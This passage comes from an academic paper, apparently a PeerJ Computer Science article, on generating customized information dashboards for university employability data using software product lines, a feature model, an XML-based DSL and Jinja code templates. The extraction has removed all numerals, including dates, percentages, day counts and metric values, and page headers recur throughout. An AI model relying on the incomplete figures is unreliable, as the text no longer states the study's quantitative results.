could become a cornerstone in decision-making processes within educational institutions. nevertheless, even after performing data analysis, identifying patterns and indicators derived from the analysis outcomes remains a complex challenge. that is why it is crucial to assist decision-makers with powerful tools that allow reaching insights about the domain of the problem, to support decisions with complete and quality information (especially in the academic context, where these processes might have a series of social implications), that is, information and knowledge that has been extracted through visual analysis. information dashboards are one of the most commonly used software products for visual data analysis and knowledge extraction (few, ; sarikaya et al., ). in a domain like employability, these tools can support exploratory studies through a set of graphical and interactive resources, allowing users to envision data more understandably (tufte & graves-morris, ) and identify relevant relations, indicators or patterns among vázquez-ingelmo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. large sets of data. it is essential to bear in mind that information dashboards are not just a set of aesthetic graphs and visualizations; they have to effectively transmit information to answer the questions of the users regarding the target domain. moreover, this is not a trivial job, because of two main reasons: data and users themselves. on the one hand, users do not have a set of standard and static requirements; they could demand different features or design attributes given their specific goals or needs. on the other hand, data is continuously increasing and evolving nowadays, so it is foreseeable that new information requirements will arise in time. returning to the employability subject, information requirements in this domain might change in many different ways as this concept could demand new kind of variables or larger amounts of data to explore emerging dimensions or to perform more in-depth analyses. for these reasons, information dashboards not only need to be useful concerning functionality but also be customizable to adapt to specific user requirements. also, they should be flexible and scalable regarding its data sources and structures, making the development and maintenance of information dashboards even more complicated. of course, these issues could be addressed by developing particular dashboards for each involved user to achieve every specific goal, but clearly, this solution would be time- consuming and would require a lot of resources during the development and maintenance phases. also, scalability would be almost impossible, as new users or changes in the requirements would necessarily imply more resources. there are, nevertheless, a series of strategies to deal with these challenges. specifically, software engineering paradigms like software product lines (clements & northrop, ; gomaa, ; pohl, böckle & van der linden, ) provide powerful theoretical frameworks to address flexibility, scalability and customization in software products that share sets of features within a common domain. through the analysis of commonalities and variability points in the product domain, it would be possible to reduce the development and maintenance effort of building tailor-made solutions. this paradigm is potentially applicable to dashboards since these software products could be factored into sets of configurable components with configurable features. this paper describes the application of the spl methodology to the dashboards’ domain through the study of their characteristics and the definition of a dsl to manage the product derivation automatically. the main focus of this research is to test the potential usefulness and feasibility of this approach to manage fine-grained features that can be scattered through different code assets, and consequently, to provide a base method for generating personalized dashboard solutions to fit concrete user requirements. the remainder of this work is structured as follows. background discusses the background of the problem of generating customized dashboards as well as their application to the employment and employability domain. context presents the application context and the motivation behind this pilot framework to generate dashboards to support visual analysis on university employment and employability data (framed within the spanish observatory for university employability and employment studies. materials and methods describes the techniques used for the development of an initial approach to a generative dashboard framework. finally, the results section exhibits the outcomes of this research to vázquez-ingelmo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. conclude with the discussion of the developed spl and the conclusions derived from these results. background the main idea behind software product lines (spls) is that the final products can be derived from a set of configurable core assets, allowing their adaptation to fit specific requirements. these core assets are developed during the domain engineering phase, in which commonality and variability of the target product domain are identified to build a common base of components. core assets are developed with variability points in which specific functionalities could be injected to obtain new products. functionalities in spls are seen as features; the combination of the defined features within the scope of the line (generally following a feature model (kang et al., ) allow stakeholders to build personalized products by reusing and assembling software components. the spl paradigm has been applied to a variety of domains: mobile applications (marinho et al., ; nascimento, ; quinton et al., ); applications for visualizing population statistics (freeman, batory & lavender, ); sensor data visualizations (logre et al., ); variable content documents (gómez et al., ); or e-learning systems (ezzat labib awad, ). these practical applications have proved the benefits of this paradigm. however, features usually refer to the software’s logic, deflecting attention to the presentation layer. the idea of generating customized dashboards can be seen as a specific case of graphical user interfaces (gui) automatic generation within spls. user interfaces require additional work regarding their implementation; they not only need to be functional but also usable to allow users to complete their tasks efficiently and achieve their goals. that is why the design of user interfaces is present through the whole development process, being time- and resource-consuming job. automation regarding gui generation in software product lines has already been faced in several works. generally, there is a lack of usability on the generated products that can be addressed by manually designing every product gui. but this approach is highly inefficient in the spl paradigm context since all the development time saved could be lost by introducing a manual task (hauptmann et al., ). integration of the gui design process and the spl paradigm is required to leverage the benefits of the two approaches (pleuss, botterweck & dhungana, ). there is, as pleuss et al. ( a); pleuss et al. ( b) pointed out, a dilemma between automation and usability. to address this challenge, they utilized model-based ui development (mbuid) methods to separate the functionality and the appearance of the gui (pleuss, botterweck & dhungana, ). on the other hand, gabillon, biri & otjacques ( ) demonstrated the possibility of creating adaptive user interfaces through the dynamic spl (dspl) paradigm and mbuid models by developing a context-aware data visualization tool that can be adapted during runtime. dspls provide a useful paradigm for adapting code at run-time, obtaining adaptive guis. kramer et al. ( ) proposed document-oriented guis with run-time variations vázquez-ingelmo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. through xml documents (kramer et al., ). this context-adaptable feature has also been achieved by sboui, ayed & alimi ( ), by developing a mobile application that is also runtime adaptable through mbuid models and reusable artifacts. in this particular case, the code generation is based on extensible stylesheet language transformations (xslt) and xml files (sboui, ayed & alimi, ). these works shows not only the viability of gui generation in the spl/dspl paradigms context but also their valuable benefits. it seems evident that gui customization requires fine-grained features to achieve the desired usability and design attributes. fine-grained features mostly require annotative approaches regarding their implementation, given their specialization. annotative approaches can address this issue because annotations can be arbitrarily specified at different source code fragments (kästner & apel, ; kästner, apel & kuhlemann, ), and provide a framework for fine-grained automated software composition through feature structure trees (apel, kastner & lengauer, ). there are different approaches to manage the implementation of variability at a fine- grained level (gacek & anastasopoules, ). especially, frame- and template-based approaches provide valuable solutions to address this fine-grained level of variability, allowing the injection of particular fragments of code at any point of the base source code. frame-based languages, like xml-based variant configuration language (xvcl) (jarzabek et al., ), provide a syntax to combine and insert fragments of code through the definition of frames, allowing the separation of concerns regarding the spl implementation (zhang, jarzabek & swe, ). templating can also achieve valuable results; templating libraries such as jinja (ronacher, ) provide powerful functionalities to annotate the source code independently of the target programming language (clark, ; ridge, gaspar & ude, ). the generation of gui within the context of a product family is still a convoluted field, although the previous work has enlightened the path to improve and leverage the automation and generation of these complex software elements. the complexity mainly comes from human factors and the vast variety of requirements regarding user interfaces. this work aims to present an application of the spl paradigm, in this case on the dashboards’ domain, considering the fine-grained nature of their features and the necessity of customizing its interaction methods and visual appearance. context the application of this work is framed within the spanish observatory for university employment and employability. the following subsections describe this organization’s mission and the motivation to generate personalized dashboards to explore its data. the observatory for university employment and employability the observatory for university employment and employability (also known as oeeu, its spanish acronym, http://oeeu.org) is an organization with the vision of becoming an information reference for understanding and exploiting knowledge about employment and employability of students from spanish universities. to do so, this network of researchers and technicians conduct studies about these fields in the academic context (michavila et vázquez-ingelmo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://oeeu.org http://dx.doi.org/ . /peerj-cs. al., a; michavila et al., ; michavila et al., b), through a data-driven approach to recollect, analyze, visualize and disseminate employment and employability data of graduates from spanish universities. firstly, in the data collection phase, universities provide their administrative records and, once this phase is completed, their students answer a questionnaire about different aspects of their education and work career. this process leaves the observatory with a significant set of variables from the students’ sample. for instance, in the study edition, more than variables were gathered from , bachelor students. moreover, in the study edition, variables were gathered from , master degree students. the volume of the data collected makes the presentation of the study results to the observatory ecosystem’s users a challenge, as the latter may have different requirements and necessities regarding the studies’ data. for these reasons, an approach based on domain engineering fits the oeeu’s needs, allowing an efficient generation of customized dashboards that meet different requirements. motivation as it has been introduced, employment and employability are complex study fields that mainly ask for exploratory analysis, given its relatively initial status of research. in the context of the spanish observatory for university employment and employability, where a vast set of variables from significant quantities of students are recollected, it is crucial to rely on exploratory visualizations that allow users and administrators to identify at a glance unusual patterns or important data points by enhancing the understanding of the presented information (card, ). in contrast with explanatory visualizations, in which the primary purpose is to tell a story through data, exploratory tools aim to facilitate users to pose more questions as data is being explored. in essence, explanatory analyses start from a question and use data to answer it. exploratory analysis, on the other hand, uses data to detect new avenues of research. for instance, when a user does not have a clear question about the data, it will use exploratory research to find patterns or relations among variables. this same user could employ the acquired knowledge to explain the insights reached through previous explorations using an explanatory visualization. exploratory visualizations rely intensely on interaction to provide their functionality and to allow users to drill-down datasets, being able to discover new aspects of the domain by directly communicating with the graphical interface. however, an interaction can take many forms, and there is not a single solution to obtain usable and intuitive interfaces valid for every user. for instance, some users could find useful a visible control panel to manage data if they are going to apply filters, aggregations and so on intensively. on the other hand, other users can demand in-place interaction if they give more importance to having more space for the visualizations (instead of having a permanent control panel consuming screen space). another example is that users that speak a left-to-right (ltr) or a right-to-left (rtl) language would demand different layouts for the same task, according to their sociodemographic or cultural context (almakky, sahandi & taylor, ; marcus & gould, vázquez-ingelmo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. ). also, visualization novices could require task-oriented dashboards to support their visual analysis, since their past experience with this kind of tools is a relevant factor when interacting with a system (elias & bezerianos, ). once patterns, relations between variables and interesting dimensions have been identified through the exploration of data, even the exploratory nature of a dashboard can change for a more explanatory purpose to present the results understandably and strikingly. for all these reasons dashboards, their components, their interaction, and even their primary purpose need advanced configuration and customization to fit into different contexts and requirements. moreover, as it has been aforementioned, spls provide a potential solution to efficiently address this customization since visual components and interaction methods could be treated as features of the product line, decreasing the resources needed during the development and maintenance of dashboards. materials & methods this section presents the materials and techniques used during the development of this first approach to a framework for generating dashboards to explore employment- and employability-related variables. meta-model the problem to address requires abstract modelling to capture basic features within the dashboards’ domain. to do so, a meta-model is proposed. meta-models are a crucial artefact in model-driven engineering and model-driven architectures (kleppe, warmer & bast, ), as they allow to define a high-level view of the domain without depending on specific technologies. therefore, meta-models should remain as simple as possible to eventually, through a series of mappings and transformations, obtain concrete models (Álvarez, evans & sammut, ). for this generic dashboards’ domain, the meta-model found in fig. is proposed. first of all, a specific user could handle a dashboard. this dashboard could be composed of one or more pages, being these last composed, in turn, by one or more containers. a container could be seen as a row or a column, and it can recursively contain more containers. the container recursion ends with a component, which is any graphic element that can be used in a dashboard. the recursion mentioned above allows the arrangement of any layout by the recurrent combination of rows and columns. this meta-model eases the vision of the dashboards’ domain, and it also allows to identify the common base of any dashboard. feature model the meta-model gives a high-level vision of the dashboards’ domain. however, it does not capture concrete features. that is why software product lines rely on feature models (kang et al., ) to identify common and variable assets. feature models not only serve as a documentation element but also as an important artifact within the development process. the implementation of the core assets and the materialization of variability points on the code must be guided by the previously defined feature model. vázquez-ingelmo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure dashboard meta-model. the dashboard meta-model allows a high level view of the target do- main. full-size doi: . /peerjcs. /fig- in this domain, the feature model will capture the dashboards’ visualization components, as well as individual features and restrictions of each visualization. the hierarchical structure of the feature model allows to define high-level characteristics and refine them through the tree structure until reaching the lower-level features (i.e., fine-grained features). this structure makes the scalability of features easier, since adding new features involves the addition of new nodes to the feature tree uniquely. for the observatory’s dashboards, three main configurable visual components (features) have been defined: a scatter diagram, a chord diagram and a heat map. these visualizations address the requirements of the observatory’s data but can be reused for other data domains. also, it is possible to specify a global filter that affects the data of all components previously defined. these high-level features of the dashboards’ product line are presented in fig. . a detailed view of the scatter diagram feature can be seen in fig. . it has a set of subsequent features, either mandatory, optional or alternative. one mandatory feature is the base logic of the scatter diagram (i.e., the component layout construction and its primary logic). another mandatory feature is the initial data that the diagram will be showing on different dimensions since it must be specified. among the optional features, it is possible to determine whether a tooltip will show up when hovering on data points if a set of controls will support the data exploration, or the capacity to zoom or export the diagram. also, a title for the visualization can be included. vázquez-ingelmo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure high-level view of the feature diagram. this feature diagram shows high-level components that could compose the dashboard. full-size doi: . /peerjcs. /fig- figure high-level view of the scatter diagram component’s features. this snippet of the feature model shows the possible features regarding the scatter diagram component. full-size doi: . /peerjcs. /fig- for the sake of simplicity, some of the lower-level features have been omitted in fig. . for instance, the bar and panel control features have subsequent features. the detailed features for a panel type control are shown in fig. to provide an example. a control panel will rely on its underlying logic, and it can count on different optional features, like data selectors to dynamically change the visualization’s presented data; in case of the x and y axes, these selectors could be located within the control panel space or in-place controls (i.e., situated near the scatter diagram axes). other possible features involve having an overview that shows a detailed view of a data point when hovering, data filters, among others. the feature diagram provides a high-level and organized overview of the spl, improving the organization of the source code and development tasks. domain-specific language there is, however, a necessity of connecting the previous models to the dashboards’ source code to be generated (voelter & visser, ). a domain-specific language (dsl) has been designed to accomplish this connection. this dsl is based on the identified domain’s features, by structuring them with xml technology (bray et al., ) and by validating the model restrictions with an xml schema (fallside, ). xml technology provides vázquez-ingelmo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure high-level view of a component’s panel subsequent features. this part of the feature diagram shows lower-level features regarding the components’ control panel. full-size doi: . /peerjcs. /fig- figure snippet of the dsl schema. it is possible to specify the dashboard layout and its elements (i.e., data filters, components, etc.). full-size doi: . /peerjcs. /fig- a readable and easy-to-parse manner for injecting functionalities or requirements in a system, fostering flexibility since these rules are not directly defined (or hard-coded) in the source code. the following examples describe the dsl developed for this work. following the meta-model, every dashboard will be composed by one or more pages, each page with its configuration (i.e., layout and components, as seen in fig. ), and each page component with its setting (given the feature model, as seen in fig. ). data resources of each visual component are represented by the xsd generic type ‘‘anytype’’, to decouple the data structure and format from the presentation, and also to open up the possibility of injecting dynamic data sources without affecting the dsl syntax. vázquez-ingelmo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure dsl schema regarding the specification of the dashboard components. it is possible to see the link between the feature model elements and the xml schema elements (e.g., the components that could compose the dashboard). full-size doi: . /peerjcs. /fig- figure dsl schema regarding the specification of the scatter diagram component. this part of the dsl represents the available features for the scatter diagram component. full-size doi: . /peerjcs. /fig- in figs. and the resemblance of the xml schema structure with the feature model can be appreciated. the hierarchical nature of xml matches with the hierarchical structure of feature diagrams. this resemblance allows better traceability of the features involved in the product line, because the syntax of the dsl is obtained from the feature model, thus providing a computer-understandable specification of the spl, necessary to process the requirements and to automate the dashboard generation. in this current approach, the dashboard’s feature model serves as documentation, but, as it will be discussed, it would be extremely valuable to create a programmatic link between this model and the dsl specification, in order to propagate and reflecting any feature model change automatically in the dsl, improving maintainability. finally, fig. shows how the layout of the dashboard is specified in terms of rows, columns and components (following, again, the meta-model previously presented). the vázquez-ingelmo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure xml type for specifying the dashboard’s layout. the dashboard layout (previously modeled through the dashboard meta-model) is specified by creating a custom type. full-size doi: . /peerjcs. /fig- dsl combines both the meta-model and feature model designs to obtain a specific syntax to configure all the aspects regarding the generation of final products. the whole schema for the dsl can be consulted at the following github repository https://github.com/andvazquez/dashboard-spl-assets (vázquez-ingelmo, ). code generator to put together all the developed assets and concepts, a code generator has been developed to manage the generation of functional dashboards. the generator interprets the dsl (i.e., xml configuration files) and selects the appropriate template (i.e., core assets of the spl) to configure them by injecting the chosen features, obtaining the dashboards’ final source code. the code templates and xml configuration files are managed by the developers following the elicited user requirements. the inputs and outputs of the code generator can be seen in fig. . code templates the next challenge regarding the implementation of this spl involves the choice of the techniques for materializing the product line’s variability points. in this case, personalization is focused on the visual elements of the system’s presentation layer, which require fine-grained variability (kästner & apel, ). coarse-grained variability involves the addition and removal of full components, which is also useful for this approach (users may prefer a scatter diagram over a chord diagram to achieve their goals, removing the last from the dashboard). however, visual components themselves (referring to the elements that compose them) also require high variability to fit into different requirements, vázquez-ingelmo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://github.com/andvazquez/dashboard-spl-assets http://dx.doi.org/ . /peerj-cs. figure code generator inputs and outputs. the code generator is fed with the code templates and the xml configuration files to provide the final source code of the dashboard. full-size doi: . /peerjcs. /fig- so fine-grained variability needs to be accomplished. there exist different approaches to implement fine-grained software composition, as in the case of featurehouse (apel, kastner & lengauer, ), which uses superimposition and feature structure trees (fsts), however, not every method supports the currently required granularity, which involves even statement-level variability. fine granularity often prohibits superimposition approaches (apel, kästner & lengauer, ). the mechanism chosen to reach the desired feature granularity is based on template engines. template engines allow to tag sections and parameterize units of source code to inject concrete values later and obtain complete source files. this mechanism accomplishes the necessity of materializing the variable features of a tangible product of the line. jinja (ronacher, ) was selected as the engine for developing the core assets of this spl. this template engine allows the definition of custom tags, filters and even macros, being the last one of the essential features to organize the core assets. as described in (kästner & apel, ), fine-grained approaches can make the source code tedious to read and maintain. by declaring every variant feature on different macros to compose them subsequently, it is possible to achieve high cohesion and loose coupling on the spl feature implementation process, improving reusability and source code organization by grouping the different functionalities by its parent feature. there was no need to implement extensions of the jinja implementation and mechanisms, as its current syntax was sufficient for the annotative approach followed. vázquez-ingelmo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure workflow of the code generation process. a simplified view of the code generator behavior. full-size doi: . /peerjcs. /fig- a diagram of the detailed workflow for generating the source code can be seen in fig. . the code templates for this case study can be also consulted at https://github.com/andvazquez/dashboard-spl-assets (vázquez-ingelmo, ). results generated dashboards as it has been already introduced, the observatory collects important datasets to research the employability and employment of graduates from spanish universities. relying on a customizable exploratory tool would increase the chances of discovering interesting patterns or relations within these complex fields. the dashboards of this case study have a series of particular requirements due to the data domain and the specific characteristics of the observatory studies. for instance, the developed data visualizations exploit different vázquez-ingelmo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://github.com/andvazquez/dashboard-spl-assets http://dx.doi.org/ . /peerj-cs. figure results derived from the first configuration. through this configuration is possible to apply different filters simultaneously to each scatter diagrams to observe how patterns evolve. full-size doi: . /peerjcs. /fig- dimensions of the observatory’s collected variables. also, the generated observatory’s dashboards needed to be connected to the organization’s graphql api (facebook, ) that allow users to retrieve data statistics on demand (vázquez-ingelmo, cruz-benito & garcía-peñalvo, ; vázquez-ingelmo, garcía-peñalvo & therón, a; vázquez- ingelmo, garcía-peñalvo & therón, b; vázquez-ingelmo, garcía-peñalvo & therón, c), decoupling the data resources from the visual components’ logic. in this section, the results derived from the application of the presented dashboard product line within the university employment and employability domain are described. by tuning spl through particular configurations, it is possible to obtain tailored solutions for different requirements and tasks. configuration # . comparison of different values is one of the most relevant tasks regarding the exploration of university employability and employment data. these comparisons could enlighten which factors affect employability and employment to a greater or lesser extent, leading to the possibility of conducting deeper analyses. for example, by configuring a dashboard with two scatter diagrams side by side, it is possible to apply different filters to each one and observe how data patterns evolve (fig. ). also, adding the global reference feature to both diagrams helps to make comparisons by adding a reference line marking the unfiltered and disaggregated values. it is possible to appreciate, for example, that men graduates are more optimistic when commenting opinions about their future wages and the possibility of developing a working career in spain (michavila et al., b). however, these diagrams also allow seeing at a glance that arts and humanities and sciences graduates are more pessimistic about their future than their counterparts in other branches of knowledge, which are more clustered. for instance, only % of sciences women graduates think that they could have a working career in spain within five years. vázquez-ingelmo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure results derived from the second configuration. the scatter diagram shows the link between different students’ opinions classified by gender. full-size doi: . /peerjcs. /fig- this configuration enables the user to explore data through the combination of different aggregations, variables and filters. configuration # . the previous configuration, however, could be complex for some users by having to control two diagrams at the same time to align different factors. a single scatter diagram could be added to the dashboard to drill-down data. it is possible to add another dimension to the scatter diagram component by mapping numerical variables through the radius of the visualization’s data points. for instance, following the same example of the first configuration, the differences between male and females can be observed by a gender aggregation of the data. in this case, the population of each group is mapped through the radius of the points (fig. ). however, to see how the branch of knowledge affects the value of these variables, similarly to the previous configuration, it is necessary to continuously filter data by every single branch (fig. ). this configuration is then not recommendable when continuous, and more complex comparisons (such as the one made in the previous scenario) are required. if, on the other hand, data exploration is not continuously required by a user, the controls could be allocated within a top bar (fig. ) that can be hidden to give more space to the visualizations. configuration # . on the other hand, different pages focused on different data variables or data dimensions could be configured. this functionality allows freedom when arranging the content of the dashboards’ pages to make it understandable for every particular user. in the observatory’s case, a user might prefer having the dashboard screens organized by the study edition, being able to navigate through them thanks to a navigation bar (fig. ). or if preferred, it could be specified that each page will exploit a different set of data variables; for example, having a single tab to explore the students’ competences (fig. ). vázquez-ingelmo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure results derived from the second configuration. the scatter diagram shows the link between different students’ opinions classified by gender and filtered by the branch of knowledge, showing only the results related to science students. full-size doi: . /peerjcs. /fig- figure modification of the second configuration to change the controls location. the controls for the scatter diagram are arranged in a bar on top of the visualization. full-size doi: . /peerjcs. /fig- through this view it is possible to see a misalignment between the perceived level that the graduates have about their skills and the perceived level of contribution of the studies regarding the acquisition of that skills, and also between that possessed level and the perceived required level in their job positions (michavila et al., b). vázquez-ingelmo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure dashboard involving different information visualizations. by specifying the layout of the dashboard it is possible to achieve dashboards with different components, each one with its own features. full-size doi: . /peerjcs. /fig- the previous dashboards are a quite tiny set of the available combinations that can be achieved through the spl configuration, but they should serve as an example to show the possibilities of having a framework for generating personalized dashboards. product metrics the metrics for the spl are the following regarding its feature model: • feature model height: • features: • optional features: the number of valid configurations has been omitted, given the recursion of the dashboards’ composition (as highlighted in the dashboard meta-model), so infinite valid configurations can be generated. vázquez-ingelmo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure possible layout configuration for comparing students’ skills through different study edi- tions. this configuration can be useful to identify lack of skills at-a-glance or their evolution through time. full-size doi: . /peerjcs. /fig- regarding the core-assets (i.e., the templates’ source code), the following metrics have been calculated (el-sharkawy, yamagishi-eichler & schmid, ): • lines of feature code (lof): , lines of feature code. this metric is the addition of every line of code affected by any jinja directive (i.e., every annotated line of code). it is a size metric that gives a high-level view about the source code associated to the spl features. vázquez-ingelmo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure simplified gantt diagram of the spl development. the gantt diagram shows each task re- garding the spl development including its contextualization and design. full-size doi: . /peerjcs. /fig- • fraction of annotated lines of code (plof): . %. this is a variability density metric showing that the spl’s products have a . % of common code ( , lines of code are not annotated). • scattering of variation points: this metric counts the number of times that a feature appears in the code (i.e., appears in a jinja condition directive). high scattering values decreases the readability of the code. by refactoring the code into macros that contain all code associated to a specific feature, the scattering is reduced. given the complex domain in which the product line has been applied (i.e., the dashboards’ domain), the scattering of the variation points was one of the main concerns, as high scattering would make the code even more complex. that was the reason to arrange the feature code into macros as a solution to address the scattering of variability points. development time improvement the development of the presented spl, including its conceptualization and design, took days, as illustrated through a simplified gantt diagram in fig. . the core assets development task includes all the artifacts regarding the spl (i.e., the dsl, the templates, etc.). before implementing this approach, a dashboard template with the same components and kpis was the solution to offer all the results held in the observatory’s study, so universities could compare their individual results with the global, aggregated results. the development of the mentioned dashboard template took days. however, this static approach limited universities to freely explore their data, as mentioned in other sections. five of the universities were interviewed to capture their dashboard requirements and to estimate the elicitation process time consumption. however, this estimation should be considered as speculative given the variability of the complexity of the elicitation process, and especially, given the number of different universities (i.e., users) involved. nevertheless, the requirement elicitation took one day for the interviewed universities. given the project’s potential continuity, the dashboard implementation process would mainly consume time regarding requirements elicitation by using the presented spl approach, decreasing the time spent on development processes. without this approach, the information dashboards implemented for future observatory’s employability study editions would remain static and generalized for each involved user. vázquez-ingelmo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. building a personalized dashboard consume resources in terms of requirement elicitation and design, but also in terms of implementation or development. if the development phases are automated, then the main benefit is not only decreasing the development time of individual dashboards, but also, if necessary, devoting more time to the requirements identification and design phases, which, in the end, are the backbone of well-constructed dashboards. that is why, although significant time was consumed for the implementation of the dashboard spl ( days), it can be seen as an investment for the future, specifically in environments where significant quantities of user profiles are involved. discussion the application of domain engineering and the spl paradigm to identify and factorize information dashboard functionalities has shown its usefulness to generate different dashboards with a set of common assets through the study of the dashboards’ domain. the obtained results are fairly valuable, and open new paths for applying this approach to other data domains with new requirements. dashboards are complex software solutions that could be highly beneficial when adequately designed and tailored for specific users. these products can support decision- making processes, assisting visual analysis by presenting information in an understandable manner. however, the variety of profiles involved in these processes and their different definitions of ‘‘understandable’’ makes the implementation of dashboards a time- and resource-consuming task, since a dashboard configuration that is highly useful for one user could be pointless for the rest of them. what is more, dashboards can be composed of several elements, from simple visualizations to different linked views, cross-filtering capabilities, interaction methods, handlers, etc., thus making the dashboards’ domain a complex domain not only because of the different profiles of potential users, but because of the great quantity of feasible combinations of these ‘‘dashboard elements’’ to build a proper solution. in addition, these features can be very fine-grained; in user-centered systems, a slight modification on visualization types, interaction patterns, layouts, color palettes, etc. could be crucial regarding the final perceived usability of the product. relying on a framework to easily generate information dashboards would allow stakeholders to focus on the information requirements and their refinement to provide better results when seeking valuable insights on large datasets. also, it opens up the possibility to automatically adapt the dashboards’ configurations to match dynamic requirements based on the device used (cruz-benito et al., b) or other factors. the factorization of the dashboards’ components into individual features allow fine- grained reusability and a set of customization options. this fine-grained customization enables the possibility of having highly functional and exploratory-centered visualizations as well as more basic visual components more centered on the explanation of insights through the addition or removal of low-level features. the achieved granularity provides a foundation to develop not only whole visualization components, but also new interaction methods and design features that can be easily interchangeable to fulfill particular sets of user requirements. vázquez-ingelmo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. an annotative method of implementation was undertaken using macros to encapsulate individual functionalities. this method takes all the benefits from the annotative approach (fine-grained customization) and avoids its code verbosity and scalability issues by dividing the core assets into base templates and macros (kästner & apel, ). although there were other possibilities to implement the variability points, such as superimposition approach (which did not fulfilled the requirements for performing this approach, as discussed in the materials & methods section) like the featurehouse framework (apel, kastner & lengauer, ; apel & lengauer, ) or the xvcl (jarzabek et al., ) mechanism (which fits the feature granularity requirements of this domain), the final decision of using a templating engine allowed the direct connection of the designed dsl with the final source code, providing a higher level language to specify the dashboards’ features, as well as the possibility of organizing the variability points into macros to increase readability, traceability and maintainability by having all the code associated to a feature in the same source file. the chosen technology to implement the dsl was xml. the decision of implementing directly the dsl in xml technology was made because of the hierarchical nature of xml, and its resemblance to the hierarchical structure of the feature diagram, thus being the designed dsl a computer-understandable ‘‘translation’’ of the feature model for the dashboard generator to process. however, this language could be not as human-readable as other dsl solutions, generating issues if a non-expert user wants to specify its dashboards requirements by himself. creating a friendly user interface to allow the dashboards’ feature selection without involving direct manipulation of the xml files can be a valuable solution to address these issues and ease the product configuration process in the future. customization at functionality level has illustrated to be straightforward, as it is possible to easily vary the behavior of the visual components through the dsl. visual design attributes customization, however, needs to be faced more deeply, as only the layout composition can be specified in detail at the moment. the visual customization challenge cannot be overlooked since dashboards not only have to provide valuable functionality; they should offer that functionality through a pleasant and usable interface (few, ; sarikaya et al., ). on the other hand, this work has addressed customization focused on the presentation layer of dashboards, but with the spl paradigm, architectural design can also be customized in order to provide different functional features regarding data processing, interoperability, storage, performance, security, etc., achieving a complete customizable dashboard solution, not only focusing on the visual presentation. regarding data acquisition, the developed tool was integrated with the observatory’s graphql api to provide dynamic data exploration. the connection to this particular type of data source involved the implementation of specific connectors to decouple the visualizations from the particular source. the variability of data sources is another identified challenge to be addressed through this approach, to support different data formats or data structures. although counting on a graphql api facilitated the data retrieval by the unification of data requests, it is essential to enable the specification of other data retrieval methods. vázquez-ingelmo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. product metrics showed that significant feature code was needed to address high customizability of the dashboards ( . % of the source code was annotated). also, arranging the feature code into macros helped to increase features’ traceability as well as to decrease the scattering of the variability points throughout the code, making the code more readable and maintainable. the approach can decrease the development time of individualized dashboards for each involved university. as presented in the results section, the spl not only offered space for development time improvements, but also enabled the capacity of offering customized solutions, which was previously regarded as unviable given the time constraints of the observatory’s project. embracing the spl paradigm can be seen as an investment for the future for projects with a common domain and with continuity over time. finally, it is clear that interesting patterns can be discovered thanks to the application of this dashboard spl on the employability and employment fields. the observatory’s data provide a great context to perform more advanced analyses to enlighten this complex domain. having powerful visualization tools allow reaching insights about patterns or factors to guide the execution of more complex analyses and make decisions about the actions to take or the future research directions, like developing machine learning (ml) models (garcía-peñalvo et al., ). regarding this last field, having visualization tools to explore the input data before training any ml model could help to build better and more accurate models through an appropriate feature selection phase guided by the previously reached insights (hall, ). the main weaknesses and limitations of this solution come from the preliminary nature of the framework; it is crucial to further validate the usability of the automatically generated products to show their usefulness to the main beneficiaries of the dashboards: the users, as well as assess its implementation in other domains. the approach needs to be further generalized to provide a more versatile method and to match also development requirements (available technology or preferred programming languages), although results seem promising. automating the generation of dashboards given their goal, their context, their end users, etc. could be extremely beneficial due to the vast potential of impact that these tools have (sarikaya et al., ). conclusions a domain engineering approach has been applied to the dashboards’ domain to obtain a spl of this type of software solution. by the identification of commonalities and variability points, a dashboard meta-model has been developed as well as a feature model to capture the different customization dimensions of the spl. the spl has been developed through an annotative approach using code templates and macros (forming the core assets of the family of products). a dsl has been designed to facilitate and automate the application engineering process. the configuration files based on the dsl feed a code generator in charge of adding or removing the 